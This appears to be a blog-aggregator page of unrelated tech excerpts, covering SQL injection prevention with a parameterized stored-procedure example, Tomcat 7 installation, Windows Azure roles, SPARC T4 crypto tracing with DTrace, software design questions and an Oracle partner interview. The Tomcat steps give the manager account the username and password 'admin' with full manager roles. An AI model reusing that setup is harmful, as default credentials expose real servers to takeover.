One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have a vulnerability, and SQL injection can bare its ugly teeth.
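
As a complementary sketch (not from the original article), here is one way the stored-procedure route can be kept safe, following the parameterization advice above: a specific procedure with typed parameters, called with CommandType.StoredProcedure so the inputs travel as data rather than as SQL text. The procedure name spGetUser is hypothetical.

    // Editor's sketch. Assumes a hypothetical procedure created as:
    //   CREATE PROCEDURE spGetUser @username VARCHAR(50), @password NVARCHAR(10)
    //   AS SELECT UserId FROM Users WHERE UserName = @username AND UserPassword = @password
    using System.Data;
    using System.Data.SqlClient;

    public static class SafeSprocExample
    {
        public static bool DoesUserExist(string username, string password)
        {
            using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;"))
            using (SqlCommand cmd = conn.CreateCommand())
            {
                cmd.CommandText = "spGetUser";                  // only the procedure name, never concatenated SQL
                cmd.CommandType = CommandType.StoredProcedure;  // inputs are bound as parameters, not SQL text
                cmd.Parameters.Add("@username", SqlDbType.VarChar, 50).Value = username;
                cmd.Parameters.Add("@password", SqlDbType.NVarChar, 10).Value = password;
                conn.Open();
                return cmd.ExecuteScalar() != null;             // a row back means the user exists
            }
        }
    }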

    Read the article

  • What is spreadsheet useful for?

    - by zvrba
    I have been in the computer business for 15 years in various roles (sysadmin, developer, researcher), and I have never encountered someone using Excel for something more advanced than formatting tables, or as an ad-hoc database that could have been maintained in a text file. I had to do heavy data-processing and plotting and for that I used some Perl scripts + gnuplot, got tired of it, and went over to R eventually. A 2D spreadsheet just didn't seem well-suited for doing statistical analyses over 5-dimensional datasets (not to mention that it produces UGLY plots). I attempted to use a spreadsheet for time-tracking, and found out that I would have been better served by a relational database, so I gave up on using Excel for that too. For example, it's important to consistently name tasks, and I needed to find out unique task names in a given column across several sheets (I had one timesheet for each month). How do you make such a "query" in a program that essentially evaluates independent cells and has little notion of relations between them? So, what are spreadsheets useful for? Why do they have a bunch of mathematical stuff built into them when, AFAICT, people use them mostly as table formatters or bad substitutes for databases?

    Read the article

  • How do I install Apache Tomcat 7?

    - by Anupesh
    These are the steps to follow to get Apache Tomcat 7 working. After downloading Apache Tomcat 7, open a terminal and go to the folder containing the downloaded tar.gz file.
    Untar the archive:
    tar -xzvf filename.tar.gz
    Move the extracted apache-Tomcat7 directory into place:
    sudo mv Directory_Name(Extracted eg. apache-Tomcat 7.0.32) /usr/local/Tomcat7
    To set the environment variables for Tomcat 7:
    sudo nano /usr/local/Tomcat7/bin/setenv.sh
    The nano editor will open; add:
    JAVA_HOME=/usr/lib/jvm/java-6-sun
    export CATALINA_OPTS="$CATALINA_OPTS -Xms128m -Xmx1024m -XX:MaxPermSize=256m"
    then hit Ctrl+X to save the file.
    To set the roles, username and password:
    sudo nano /usr/local/Tomcat7/conf/tomcat-users.xml
    <role rolename="manager-gui" />
    <role rolename="manager-script" />
    <role rolename="manager-jmx" />
    <role rolename="manager-status" />
    <user username="admin" password="admin" roles="manager-gui,manager-script,manager-jmx,manager-status"/>
    Hit Ctrl+X to save the file.
    If there is a port number conflict, open this file and change the connector port as you want:
    sudo nano /usr/local/Tomcat7/conf/server.xml

    Read the article

  • Windows Azure Upgrade Domain

    - by kaleidoscope
    Windows Azure automatically divides your role instances into "logical" domains called upgrade domains. During an upgrade, Azure updates these domains one by one. This is by-design behavior to avoid nasty situations. One of the more recent feature additions and enhancements on the platform was the ability to notify your role instances of "environment" changes, adding or removing instances being the most common. In such a case, all your roles get a notification of the change. Imagine 50 or 60 role instances all getting notified at once and starting to take various actions in response; it would be a complete disaster for your service. The way to address this problem is upgrade domains. During an upgrade, Windows Azure updates them one by one, and only the role instances associated with a specific domain get notified of the changes taking place. Only a small number of your role instances get notified and react, while the rest remain intact, providing a seamless upgrade experience with no service disruption or downtime. http://www.kefalidis.me/archive/2009/11/27/windows-azure-ndash-what-is-an-upgrade-domain.aspx   Lokesh, M
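
    As an illustrative sketch (not part of the original note), this is roughly how a role instance can see which update domain it belongs to and react to the environment-change notifications mentioned above, using the ServiceRuntime API; the logging call and the decision not to recycle are placeholders.

        using System.Diagnostics;
        using System.Linq;
        using Microsoft.WindowsAzure.ServiceRuntime;

        public class WebRole : RoleEntryPoint
        {
            public override bool OnStart()
            {
                // Which upgrade (update) domain does this instance belong to?
                Trace.WriteLine("Running in update domain " + RoleEnvironment.CurrentRoleInstance.UpdateDomain);

                // Raised when an environment change (e.g. instances added or removed) is about to be applied.
                RoleEnvironment.Changing += (sender, e) =>
                {
                    if (e.Changes.OfType<RoleEnvironmentTopologyChange>().Any())
                    {
                        // Handle the change in place; set e.Cancel = true to recycle the instance instead.
                        e.Cancel = false;
                    }
                };

                return base.OnStart();
            }
        }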

    Read the article

  • Inheritance versus Composition in a business application

    - by ProfK
    I have a training management and tracking system, with a high-level structure as follows: We have a Role1, e.g. Manager, Shift-boss, miner, etc., and a Candidate, training for that Role. The role has a list of courses and their subjects the candidate needs to complete to qualify for the role. Candidate has a TrainingHistory attribute, containing the courses and subjects they have completed, their results, and the date completed. Now I see it as a TrainingHistoryCourse is-a Course, extended to add DateCompleted etc., but something is nagging at me to rather use something like a TrainingHistoryRecord that has-a Course. How can I further analyse this to determine which pattern to use? Then, a Role has a list of RoleTask definitions that the Candidate must be observed practising, and a Candidate has a history of RoleTaskObservation objects recording their performance at these tasks. This is very similar to the course/subject requirement and history pattern for the candidate, except for one less hierarchical level, but a RoleTaskObservation clearly does not have an is-a relationship with RoleTask, unless I block my nose and rather use ObservedRoleTask. I would prefer to use the same pattern for both subject/course and task/observation structures, but I think that would force me to adopt a composition pattern for TrainingHistoryCourse. What is the wisdom here? Always inherit where possible and validated by a solid is-a association, or always favour composition wherever possible? 1 Client specified this to be called JobTitle, but he isn't writing the app, and a JobTitle is only one attribute of a Role. Authorization roles are handled by the DevExpress framework and its customization hooks, so there would be very little confusion between a business Role in my domain objects and an authorization role in lower level, framework code.
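
    For illustration only (not from the question), a minimal C# sketch of the composition option: the history record has-a Course plus the completion details, rather than pretending to be a Course with extra fields. Class names and property types are assumptions.

        using System;
        using System.Collections.Generic;

        public class Course
        {
            public string Code { get; set; }
            public string Title { get; set; }
        }

        // Composition: a history entry references the Course it is about
        // and adds the facts that only exist once the course is completed.
        public class TrainingHistoryRecord
        {
            public Course Course { get; set; }
            public DateTime DateCompleted { get; set; }
            public decimal Result { get; set; }
        }

        public class Candidate
        {
            private readonly List<TrainingHistoryRecord> trainingHistory = new List<TrainingHistoryRecord>();

            // The candidate owns its history; the records merely point at shared Course definitions.
            public IList<TrainingHistoryRecord> TrainingHistory
            {
                get { return trainingHistory; }
            }
        }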

    Read the article

  • How to tell if SPARC T4 crypto is being used?

    - by danx
    A question that often comes up when running applications on SPARC T4 systems is "How can I tell if hardware crypto acceleration is being used?" To review, the SPARC T4 processor includes a crypto unit that supports several crypto instructions. For hardware crypto these include 11 AES instructions, 4 xmul* instructions (for AES GCM carryless multiply), mont for Montgomery multiply (optimizes RSA and DSA), and 5 des_* instructions (for DES3). For hardware hash algorithm optimization, the T4 has the md5, sha1, sha256, and sha512 instructions (the last two are used for SHA-224 and SHA-384). First off, it's easy to tell if the processor has the T4 crypto instructions: use the isainfo -v command and look for "sparcv9" and "aes" (and other hash and crypto algorithms) in the output:
    $ isainfo -v
    64-bit sparcv9 applications
        crc32c cbcond pause mont mpmul sha512 sha256 sha1 md5 camellia kasumi des aes ima hpc vis3 fmaf asi_blk_init vis2 vis popc
    These instructions are not privileged, so they are available for direct use in user-level applications and libraries (such as OpenSSL). Here is the "openssl speed -evp" command shown with the built-in t4 engine and with the pkcs11 engine. Both run the T4 AES instructions, but the t4 engine is faster than the pkcs11 engine because it has less overhead (especially for smaller packet sizes):
    t-4 $ /usr/bin/openssl version
    OpenSSL 1.0.0j 10 May 2012
    t-4 $ /usr/bin/openssl engine
    (t4) SPARC T4 engine support
    (dynamic) Dynamic engine loading support
    (pkcs11) PKCS #11 engine support
    t-4 $ /usr/bin/openssl speed -evp aes-128-cbc # t4 engine used by default
    . . .
    The 'numbers' are in 1000s of bytes per second processed.
    type 16 bytes 64 bytes 256 bytes 1024 bytes 8192 bytes
    aes-128-cbc 487777.10k 816822.21k 986012.59k 1017029.97k 1053543.08k
    t-4 $ /usr/bin/openssl speed -engine pkcs11 -evp aes-128-cbc
    engine "pkcs11" set.
    . . .
    The 'numbers' are in 1000s of bytes per second processed.
    type 16 bytes 64 bytes 256 bytes 1024 bytes 8192 bytes
    aes-128-cbc 31703.58k 116636.39k 350672.81k 696170.50k 993599.49k
    Note: The "-evp" flag indicates use of the OpenSSL "EnVeloPe" API, which gives more accurate results. That's because it tells OpenSSL to use the same API that external programs use when calling OpenSSL libcrypto functions, evp(3openssl).
    DTrace Shows if T4 Crypto Functions Are Used
    OK, good enough, the isainfo(1) command shows the instructions are present, but how does one know if they are being used? Chi-Chang Lin, who works on Oracle Solaris performance, wrote a DTrace script to show if T4 instructions are being executed. To show the T4 instructions are being used, run the following DTrace script. Look for functions named "t4" and "yf" in the output. The OpenSSL T4 engine uses functions named "t4" and the PKCS#11 engine uses functions named "yf". To demonstrate, I'll first run "openssl speed" with the built-in t4 engine then with the pkcs11 engine. The performance numbers are not valid due to dtrace probes slowing things down.
    t-4 # dtrace -Z -n 'pid$target::*yf*:entry,pid$target::*t4_*:entry{ @[probemod, probefunc] = count();}' \
      -c "/usr/bin/openssl speed -evp aes-128-cbc"
    dtrace: description 'pid$target::*yf*:entry' matched 101 probes
    . . .
dtrace: pid 2029 has exited
libcrypto.so.1.0.0 ENGINE_load_t4 1
libcrypto.so.1.0.0 t4_DH 1
libcrypto.so.1.0.0 t4_DSA 1
libcrypto.so.1.0.0 t4_RSA 1
libcrypto.so.1.0.0 t4_destroy 1
libcrypto.so.1.0.0 t4_free_aes_ctr_NIDs 1
libcrypto.so.1.0.0 t4_init 1
libcrypto.so.1.0.0 t4_add_NID 3
libcrypto.so.1.0.0 t4_aes_expand128 5
libcrypto.so.1.0.0 t4_cipher_init_aes 5
libcrypto.so.1.0.0 t4_get_all_ciphers 6
libcrypto.so.1.0.0 t4_get_all_digests 59
libcrypto.so.1.0.0 t4_digest_final_sha1 65
libcrypto.so.1.0.0 t4_digest_init_sha1 65
libcrypto.so.1.0.0 t4_sha1_multiblock 126
libcrypto.so.1.0.0 t4_digest_update_sha1 261
libcrypto.so.1.0.0 t4_aes128_cbc_encrypt 1432979
libcrypto.so.1.0.0 t4_aes128_load_keys_for_encrypt 1432979
libcrypto.so.1.0.0 t4_cipher_do_aes_128_cbc 1432979
t-4 # dtrace -Z -n 'pid$target::*yf*:entry,pid$target::*t4_*:entry{ @[probemod, probefunc] = count();}' \
  -c "/usr/bin/openssl speed -engine pkcs11 -evp aes-128-cbc"
dtrace: description 'pid$target::*yf*:entry' matched 101 probes
engine "pkcs11" set.
. . .
dtrace: pid 2033 has exited
libcrypto.so.1.0.0 ENGINE_load_t4 1
libcrypto.so.1.0.0 t4_DH 1
libcrypto.so.1.0.0 t4_DSA 1
libcrypto.so.1.0.0 t4_RSA 1
libcrypto.so.1.0.0 t4_destroy 1
libcrypto.so.1.0.0 t4_free_aes_ctr_NIDs 1
libcrypto.so.1.0.0 t4_get_all_ciphers 1
libcrypto.so.1.0.0 t4_get_all_digests 1
libsoftcrypto.so.1 rijndael_key_setup_enc_yf 1
libsoftcrypto.so.1 yf_aes_expand128 1
libcrypto.so.1.0.0 t4_add_NID 3
libsoftcrypto.so.1 yf_aes128_cbc_encrypt 1542330
libsoftcrypto.so.1 yf_aes128_load_keys_for_encrypt 1542330
So, as shown above, the OpenSSL built-in t4 engine executes t4_* functions (which are hand-coded assembly executing the T4 AES instructions) and the OpenSSL pkcs11 engine executes *yf* functions.
Programmatic Use of OpenSSL T4 engine
The OpenSSL t4 engine is used automatically with the /usr/bin/openssl command line. Chi-Chang Lin also points out that if you're calling the OpenSSL API (libcrypto.so) from a program, you must call ENGINE_load_builtin_engines(), otherwise the built-in t4 engine will not be loaded. You do not call ENGINE_set_default(). That's because the "openssl speed -evp" test calls ENGINE_load_builtin_engines() even though the "-engine" option wasn't specified.
OpenSSL T4 engine Availability
The OpenSSL t4 engine is available with Solaris 11 and 11.1. For Solaris 10 08/11 (U10), you need to use the OpenSSL pkcs11 engine. The OpenSSL t4 engine is distributed only with the version of OpenSSL distributed with Solaris (and not third-party or self-compiled versions of OpenSSL). The OpenSSL engine implements the AES cipher for Solaris 11, released 11/2011. For Solaris 11.1, released 11/2012, the OpenSSL engine adds optimization for the MD5, SHA-1, and SHA-2 hash algorithms, and DES-3. Although the T4 processor has Camellia and Kasumi block cipher instructions, these are not implemented in the OpenSSL T4 engine. The following charts may help view availability of optimizations. The first chart shows what's available with Solaris CLIs and APIs, the second chart shows what's available in Solaris OpenSSL.
Native Solaris Optimization for SPARC T4
This table shows Solaris native CLI and API support. As such, these algorithms are all available with the OpenSSL pkcs11 engine.
CLIs: "openssl -engine pkcs11", encrypt(1), decrypt(1), mac(1), digest(1), md5sum(1), sha1sum(1), sha224sum(1), sha256sum(1), sha384sum(1), sha512sum(1)
APIs: PKCS#11 library libpkcs11(3LIB) (includes the OpenSSL pkcs11 engine), libMD(3LIB), and Solaris kernel modules
Algorithm | Solaris 10 08/11 (U10) | Solaris 11 | Solaris 11.1
AES-ECB, AES-CBC, AES-CTR, AES-CFB128 | X | X | X
DES3-ECB, DES3-CBC, DES2-ECB, DES2-CBC, DES-ECB, DES-CBC | X | X | X
bignum Montgomery multiply (RSA, DSA) | X | X | X
MD5, SHA-1, SHA-256, SHA-384, SHA-512 | X | X | X
SHA-224 | - | - | X
ARCFOUR (RC4) | - | - | X
Solaris OpenSSL T4 Engine Optimization
This table is for the Solaris OpenSSL built-in t4 engine. Algorithms listed above are also available through the OpenSSL pkcs11 engine.
CLI: openssl(1openssl)
APIs: openssl(5), engine(3openssl), evp(3openssl), libcrypto crypto(3openssl)
Algorithm | Solaris 11 | Solaris 11 SRU2 | Solaris 11.1
AES-ECB, AES-CBC, AES-CTR, AES-CFB128 | X | X | X
DES3-ECB, DES3-CBC, DES-ECB, DES-CBC | - | - | X
bignum Montgomery multiply (RSA, DSA) | - | - | X
MD5, SHA-1, SHA-256, SHA-384, SHA-512 | - | X | X
SHA-224 | - | - | X
Source Code Availability
Solaris
Most of the T4 assembly code that calls the new T4 crypto instructions was written by Ferenc Rákóczi of the Solaris Security group, with assistance from others. You can download the Solaris source for this and other parts of Solaris as a few zip files at the Oracle Download website. The relevant source files are generally under the directories usr/src/common/crypto/{aes,arcfour,des,md5,modes,sha1,sha2}/sun4v/ and usr/src/common/bignum/sun4v/. The Solaris 11 binary is available from the Oracle Solaris 11 download website.
OpenSSL t4 engine
The source for the OpenSSL t4 engine, which is based on the Solaris source above, is viewable through the OpenGrok source code browser in the directory src/components/openssl/openssl-1.0.0/engines/t4. You can download the source from the same website or through Mercurial source code management, hg(1).
Conclusion
Oracle Solaris with SPARC T4 provides a rich set of accelerated cryptographic and hash algorithms. Using the latest update, Solaris 11.1, provides the best set of optimized algorithms, but alternatives are often available, sometimes slightly slower, for releases back to Solaris 10 08/11 (U10).
Reference
See also these earlier blogs.
SPARC T4 OpenSSL Engine by myself, Dan Anderson (2011), discusses the OpenSSL T4 engine and reviews the SPARC T4 processor for the Solaris 11 release.
Exciting Crypto Advances with the T4 processor and Oracle Solaris 11 by Valerie Fenwick (2011) discusses crypto algorithms that were optimized for the T4 processor with the Solaris 11 FCS (11/11) and Solaris 10 08/11 (U10) release.
T4 Crypto Cheat Sheet by Stefan Hinker (2012) discusses how to make T4 crypto optimization available to various consumers (such as SSH, Java, OpenSSL, Apache, etc.).
High Performance Security For Oracle Database and Fusion Middleware Applications using SPARC T4 (PDF, 2012) discusses SPARC T4 and its usage to optimize application security.
Configuring Oracle iPlanet WebServer / Oracle Traffic Director to use crypto accelerators on T4-1 servers by Meena Vyas (2012)

    Read the article

  • Moving from Test Automation to Development

    - by avgvstvs
    I'm in an interesting quandary. I've been doing test automation using QTP for about 1.5 years, and am in the slow process of switching to a developer role at my current company. I also begin my Master's in CS this fall. An old friend is trying to recruit me for a Sr. Test Automation position that could potentially pay me $23k more for the exact same thing I do now. But obviously I would defer moving to development. The new company is much more technical overall (I would be moving from financial services to industrial automation), and they have MANY more software dev roles available. I know traditionally QA type jobs carry an odd "danger" tag, but test automation is really a different beast. Does anyone have any experience moving from test automation to development? Does the QA stigma exist? The extra $$ would be nice, but not at the expense of my career. I should note that my Master's will be on systems/parallel programming, so one thought is that I'll get automatic consideration for development upon completing my Master's. I also work 6hrs/wk doing game development with a friend.

    Read the article

  • Windows Azure Learning Plan - Compute

    - by BuckWoody
    This is one in a series of posts on a Windows Azure Learning Plan. You can find the main post here. This one deals with the "compute" function of Windows Azure, which includes Configuration Files, the Web Role, the Worker Role, and the VM Role. There is a general programming guide for Windows Azure that you can find here to help with the overall process.
    Configuration Files -- Configuration Files define the environment for a Windows Azure application, similar to an ASP.NET application. This section explains how to work with these.
      General Introduction and Overview: http://blogs.itmentors.com/bill/2009/11/04/configuration-files-and-windows-azure/
      Service Definition File Schema: http://msdn.microsoft.com/en-us/library/ee758711.aspx
      Service Configuration File Schema: http://msdn.microsoft.com/en-us/library/ee758710.aspx
    Windows Azure Web Role -- The Web Role runs code (such as ASP pages) that requires a User Interface.
      Web Role "Boot Camp" Video: https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?culture=en-US&EventID=1032470854&CountryCode=US
      Web Role Deployment Checklist: http://blogs.infragistics.com/blogs/anton_staykov/archive/2010/06/30/windows-azure-web-role-deployment-checklist.aspx
      Using a Web Role as a Worker Role for Small Applications: http://www.31a2ba2a-b718-11dc-8314-0800200c9a66.com/2010/12/how-to-combine-worker-and-web-role-in.html
    Windows Azure Worker Role -- The Worker Role is used for code that does not require a direct User Interface.
      Worker Role "Boot Camp" Video: https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?culture=en-US&EventID=1032470871&CountryCode=US
      Worker Role versus Web Roles: http://msdn.microsoft.com/en-us/library/gg433012.aspx
      Deploying other applications (like Java) in a Windows Azure Worker Role: http://blogs.msdn.com/b/mariok/archive/2011/01/05/deploying-java-applications-in-azure.aspx
    Windows Azure VM Role -- The Windows Azure VM Role is an Operating System-level mechanism for code deployment.
      VM Role Overview and Details: http://msdn.microsoft.com/en-us/library/gg465398.aspx
      The proper use of the VM Role: http://blogs.msdn.com/b/buckwoody/archive/2010/12/28/the-proper-use-of-the-vm-role-in-windows-azure.aspx

    Read the article

  • Software management for 2 programmers

    - by kajo
    Hi all, my very good friend and I run a small business. We have a company and we develop web apps using Scala. We started 3 months ago and we have a lot of work now. We cannot afford to employ another programmer because we can't pay him yet. Until now we have tried to manage the entire development process very simply. We use Excel sheets for simple bug tracking and we work on client requests on the fly. We have no plan for next week or anything similar. But now I find this very inefficient and unworkable. I am trying to find some rules or a methodology suited to a small team, or to only two people. For example, Scrum seems, IMO, ill-suited for us: there are a lot of roles (ScrumMaster, Product Owner, Team...) and it seems like overkill. Can you advise me on something? Do you have any experience with software management in small teams? Is any current agile methodology a good fit for a pair of programmers? Is there any simple management software (bug tracking, maybe a wiki, or time tracking) for two coders? Thanks a lot for sharing.

    Read the article

  • Managing user privileges, best practice.

    - by Loïc N.
    I am new to web development. I'm creating a website where different users can have different privileges, such as creating/editing/deleting a news item, or adding/editing/deleting whatever kind of content on the website. I started by creating a "user type" that would indicate the user's privileges (such as "user", "newser", "moderator", "admin", and so on), but I quickly started noticing issues that made me think this might be a naive approach. What if I want to give a regular user the right to edit a news item (for whatever reason)? Then the user would be half "user", half "newser", but the system I use can only handle one user type. So what would be the best practice here? I was thinking of removing the concept of roles (or "user types" such as newser) and keeping only the concept of a "privilege", where every user could have zero to many privileges. So, to re-use the above example, if I wanted a user to have the right to edit some news, I would only have to give him an "edit news" privilege. Is this the way to go?
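    One way to picture that privilege-based model is sketched below. This is a hypothetical illustration in C, independent of whatever web stack is actually in use, and the privilege names are made up: each user carries a set of independent privilege flags, and every action is gated by a single has_privilege check rather than by the user's type.

    /* Hypothetical sketch: privileges as independent flags rather than a
     * single "user type". Any storage (bitmask column, join table, etc.)
     * works; the point is that checks ask "does this user hold this
     * privilege?" instead of "what type is this user?". */
    #include <stdio.h>

    enum privilege {
        PRIV_EDIT_NEWS   = 1u << 0,
        PRIV_DELETE_NEWS = 1u << 1,
        PRIV_MODERATE    = 1u << 2,
        PRIV_ADMIN       = 1u << 3
    };

    struct user {
        const char  *name;
        unsigned int privileges;   /* zero or more PRIV_* flags OR'ed together */
    };

    static int has_privilege(const struct user *u, unsigned int priv)
    {
        return (u->privileges & priv) == priv;
    }

    int main(void)
    {
        /* A "regular" user who has additionally been granted news editing. */
        struct user alice = { "alice", PRIV_EDIT_NEWS };

        if (has_privilege(&alice, PRIV_EDIT_NEWS))
            printf("%s may edit news\n", alice.name);
        if (!has_privilege(&alice, PRIV_DELETE_NEWS))
            printf("%s may not delete news\n", alice.name);
        return 0;
    }

    Named roles such as "moderator" can then be reintroduced as convenient bundles of privileges granted together, without ever limiting a user to exactly one bundle.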

    Read the article

  • Cloud-Burst 2012 – Windows Azure Developer Conference in Sweden

    - by Alan Smith
    The Sweden Windows Azure Group (SWAG) will be running “Cloud-Burst 2012”, a two-day Windows Azure conference hosted at the Microsoft offices in Akalla, near Stockholm, on the 27th and 28th September, with an Azure Hands-on Labs Day at AddSkills on the 29th September. The event is free to attend, and will feature presentations on the latest Azure technologies from Microsoft MVPs and evangelists. The following presentations will be delivered on the Thursday (27th) and Friday (28th):
    · Connecting Devices to Windows Azure - Windows Azure Technical Evangelist Brady Gaster
    · Grid Computing with 256 Windows Azure Worker Roles - Connected System Developer MVP Alan Smith
    · ‘Warts and all’. The truth about Windows Azure development - BizTalk MVP Charles Young
    · Using Azure to Integrate Applications - BizTalk MVP Charles Young
    · Riding the Windows Azure Service Bus: Cross-‘Anything’ Messaging - Windows Azure MVP & Regional Director Christian Weyer
    · Windows Azure, Identity & Access - and you - Developer Security MVP Dominick Baier
    · Brewing Beer with Windows Azure - Windows Azure MVP Maarten Balliauw
    · Architectural patterns for the cloud - Windows Azure MVP Maarten Balliauw
    · Windows Azure Web Sites and the Power of Continuous Delivery - Windows Azure MVP Magnus Mårtensson
    · Advanced SQL Azure - Analyze and Optimize Performance - Windows Azure MVP Nuno Godinho
    · Architect your SQL Azure Databases - Windows Azure MVP Nuno Godinho
    There will be a chance to get your hands on the latest Azure bits and an Azure trial account at the Hands-on Labs Day on Saturday (29th), with Brady Gaster, Magnus Mårtensson and Alan Smith there to provide guidance, and some informal and entertaining presentations. Attendance for the conference and Hands-on Labs Day is free, but please only register if you can make it (and cancel if you cannot). Cloud-Burst 2012 event details and registration are here: http://www.azureug.se/CloudBurst2012/ Registration for Sweden Windows Azure Group Stockholm is here: swagmembership.eventbrite.com The event has been made possible by kind contributions from our sponsors, Knowit, AddSkills and Microsoft Sweden.

    Read the article

  • Silverlight Cream for May 29, 2010 -- #872

    - by Dave Campbell
    In this Issue: Michael Washington, Chris Koenig, Kunal Chowdhury, SilverLaw, Shayne Burgess, Ian T. Lackey, Alan Beasley, Marlon Grech. Shoutouts: Ozymandias has a post up that's not Silverlight necessarily, but it's pretty cool: Typeface Selection Flowchart Damian Schenkelman posted about the latest: Prism 2.2 Release available. Get it at Codeplex. From SilverlightCream.com: Silverlight 4 OData Paging with RX Extensions Michael Washington continues with this OData and Rx post using the View Model Style. Michael has some good external links, good info, and all the code. WP7 Part 4: Morphing and Mapping Chris Koenig has the 4th in his WP7 series he's doing, and this one is on MVVMLight and BingMaps ... code included. Silverlight 4: Interoperability with Excel using the COM Object Kunal Chowdhury has a post up about Excel Interoperability using the COM object including opening an Excel Workbook and writing data out, then modifying the data in the spreadsheet and seeing it updated in the app. Creating A Flexible Surface Effect – Silverlight 4 (Part 1) SilverLaw put up a demo of an awesome 'water ripple' SL4 demo a couple days ago, and now he's got part 1 of a great tutorial explaining it all. Service Operations and the WCF Data Services Client Shayne Burgess has a post up about Service Operations and how they can be used by the WCF Data Services client. Role Based Silverlight Behaviors Also from the Open Light Group, Ian T. Lackey has a post up about Behaviors that takes a list of roles and updates the UI appropriatetly. How to Toggle (Show/Hide) using Behaviours (Behaviors) between Visual States or Storyboards in Expression Blend for Windows Phone Alan Beasley has a quick post up talking about the solution he found to a problem he was having with state switching in a WP7 app. MEFedMVVM: Testability Marlon Grech has another MEFedMVVM post up and he's discussing Testability all rolled in there with everything else :) Stay in the 'Light! Twitter SilverlightNews | Twitter WynApse | WynApse.com | Tagged Posts | SilverlightCream Join me @ SilverlightCream | Phoenix Silverlight User Group Technorati Tags: Silverlight    Silverlight 3    Silverlight 4    Windows Phone MIX10

    Read the article

  • Issue 15: SVP Focus

    - by rituchhibber
         SVP FOCUS FOCUS -- Chris Baker SVP Oracle Worldwide ISV-OEM-Java Sales Chris Baker is the Global Head of ISV/OEM Sales responsible for working with ISV/OEM partners to maximise Oracle's business through those partners, whilst maximising those partners’ business to their end users. Chris works with partners, customers, innovators, investors and employees to develop innovative business solutions using Oracle products, services and skills. RESOURCES -- Oracle PartnerNetwork (OPN) OPN Solutions Catalog Oracle Exastack Program Oracle Exastack Optimized Oracle Cloud Computing Oracle Engineered Systems Oracle and Java SUBSCRIBE FEEDBACK PREVIOUS ISSUES "By taking part in marketing activities, our partners accelerate their sales cycles." -- Firstly, could you please explain Oracle's current strategy for ISV partners, globally and in EMEA? Oracle customers use independent software vendor (ISV) applications to run their businesses. They use them to generate revenue and to fulfil obligations to their own customers. Our strategy is very straight-forward. We want all of our ISV partners and OEMs to concentrate on the things that they do the best—building applications to meet the unique industry and functional requirements of their customer. We want to ensure that we deliver a best-in-class application platform so ISVs are free to concentrate their effort on their application functionality and user experience We invest over four billion dollars in research and development every year, and we want our ISVs to benefit from all of that investment in operating systems, virtualisation, databases, middleware, engineered systems, and other hardware. By doing this, we help them to reduce their costs, gain more consistency and agility for quicker implementations, and also rapidly differentiate themselves from other application vendors. It's all about simplification because we believe that around 25 to 30 percent of the development costs incurred by many ISVs are caused by customising infrastructure and have nothing to do with their applications. Our strategy is to enable our ISV partners to standardise their application platform using engineered architecture, so they can write once to the Oracle stack and deploy seamlessly in the cloud, on-premise, or in hybrid deployments. It's really important that architecture is the same in order to keep cost and time overheads at a minimum, so we provide standardisation and an environment that enables our ISVs to concentrate on the core business that makes them the most money and brings them success. How do you believe this strategy is helping the ISVs to work hand-in-hand with Oracle to ensure that end customers get the industry-leading solutions that they need? We work with our ISVs not just to help them be successful, but also to help them market themselves. We have something called the 'Oracle Exastack Ready Program', which enables ISVs to publicise themselves as 'Ready' to run the core software platforms that run on Oracle's engineered systems including Exadata and Exalogic. So, for example, they can become 'Database Ready' which means that they use the latest version of Oracle Database and therefore can run their application without modification on Exadata or the Oracle Database Appliance. Alternatively, they can become WebLogic Ready, Oracle Linux Ready and Oracle Solaris Ready which means they run on the latest release and therefore can run their application, with no new porting work, on Oracle Exalogic. 
Those 'Ready' logos are important in helping ISVs advertise to their customers that they are using the latest technologies which have been fully tested. We now also have Exadata Ready and Exalogic Ready programmes which allow ISVs to promote the certification of their applications on these platforms. This highlights these partners to Oracle customers as having solutions that run fluently on the Oracle Exadata Database Machine, the Oracle Exalogic Elastic Cloud or one of our other engineered systems. This makes it easy for customers to identify solutions and provides ISVs with an avenue to connect with Oracle customers who are rapidly adopting engineered systems. We have also taken this programme to the next level in the shape of 'Oracle Exastack Optimized' for partners whose applications run best on the Oracle stack and have invested the time to fully optimise application performance. We ensure that Exastack Optimized partner status is promoted and supported by press releases, and we help our ISVs go to market and differentiate themselves through the use of our technology and the standardisation it delivers. To date we have had several hundred organisations successfully work through our Exastack Optimized programme. How does Oracle's strategy of offering pre-integrated open platform software and hardware allow ISVs to bring their products to market more quickly? One of the problems for many ISVs is that they have to think very carefully about the technology on which their solutions will be deployed, particularly in the cloud or hosted environments. They have to think hard about how they secure these environments, whether the concern is, for example, middleware, identity management, or securing personal data. If they don't use the technology that we build-in to our products to help them to fulfil these roles, they then have to build it themselves. This takes time, requires testing, and must be maintained. By taking advantage of our technology, partners will now know that they have a standard platform. They will know that they can confidently talk about implementation being the same every time they do it. Very large ISV applications could once take a year or two to be implemented at an on-premise environment. But it wasn't just the configuration of the application that took the time, it was actually the infrastructure - the different hardware configurations, operating systems and configurations of databases and middleware. Now we strongly believe that it's all about standardisation and repeatability. It's about making sure that our partners can do it once and are then able to roll it out many different times using standard componentry. What actions would you recommend for existing ISV partners that are looking to do more business with Oracle and its customer base, not only to maximise benefits, but also to maximise partner relationships? My team, around the world and in the EMEA region, is available and ready to talk to any of our ISVs and to explore the possibilities together. We run programmes like 'Excite' and 'Insight' to help us to understand how we can help ISVs with architecture and widen their environments. But we also want to work with, and look at, new opportunities - for example, the Machine-to-Machine (M2M) market or 'The Internet of Things'. Over the next few years, many millions, indeed billions of devices will be collecting massive amounts of data and communicating it back to the central systems where ISVs will be running their applications. 
